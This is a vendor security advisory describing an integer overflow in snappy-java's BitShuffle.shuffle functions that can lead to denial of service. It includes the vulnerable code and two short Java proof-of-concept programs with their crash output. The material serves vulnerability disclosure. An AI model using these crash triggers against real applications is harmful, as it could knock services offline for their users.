Seal Security raises $13M series A to secure open source code at scale. Read full press release.
.avif)
## SummaryDue to unchecked multiplications, an integer overflow may occur, causing a fatal error.## ImpactDenial of Service## DescriptionThe function [shuffle(int[] input)](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/BitShuffle.java#L107) in the file [BitShuffle.java](https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/BitShuffle.java) receives an array of integers and applies a bit shuffle on it. It does so by multiplying the length by 4 and passing it to the natively compiled shuffle function.```javapublic static byte[] shuffle(int[] input) throws IOException { byte[] output = new byte[input.length * 4]; int numProcessed = impl.shuffle(input, 0, 4, input.length * 4, output, 0); assert(numProcessed == input.length * 4); return output; }```Since the length is not tested, the multiplication by four can cause an integer overflow and become a smaller value than the true size, or even zero or negative. In the case of a negative value, a “java.lang.NegativeArraySizeException” exception will raise, which can crash the program. In a case of a value that is zero or too small, the code that afterwards references the shuffled array will assume a bigger size of the array, which might cause exceptions such as “java.lang.ArrayIndexOutOfBoundsException”.The same issue exists also when using the “shuffle” functions that receive a double, float, long and short, each using a different multiplier that may cause the same issue.## Steps To ReproduceCompile and run the following code:```javapackage org.example;import org.xerial.snappy.BitShuffle;import java.io.*;public class Main { public static void main(String[] args) throws IOException { int[] original = new int[0x40000000]; byte[] shuffled = BitShuffle.shuffle(original); System.out.println(shuffled[0]); }}```The program will crash, showing the following error (or similar):```Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: Index 0 out of bounds for length 0 at org.example.Main.main(Main.java:12)Process finished with exit code 1```Alternatively - compile and run the following code:```javapackage org.example;import org.xerial.snappy.BitShuffle;import java.io.*;public class Main { public static void main(String[] args) throws IOException { int[] original = new int[0x20000000]; byte[] shuffled = BitShuffle.shuffle(original); }}```The program will crash with the following error (or similar):```Exception in thread "main" java.lang.NegativeArraySizeException: -2147483648 at org.xerial.snappy.BitShuffle.shuffle(BitShuffle.java:108) at org.example.Main.main(Main.java:11)```
Fix available through Seal Security. No upgrade required, protect your application instantly.
Fix without upgrading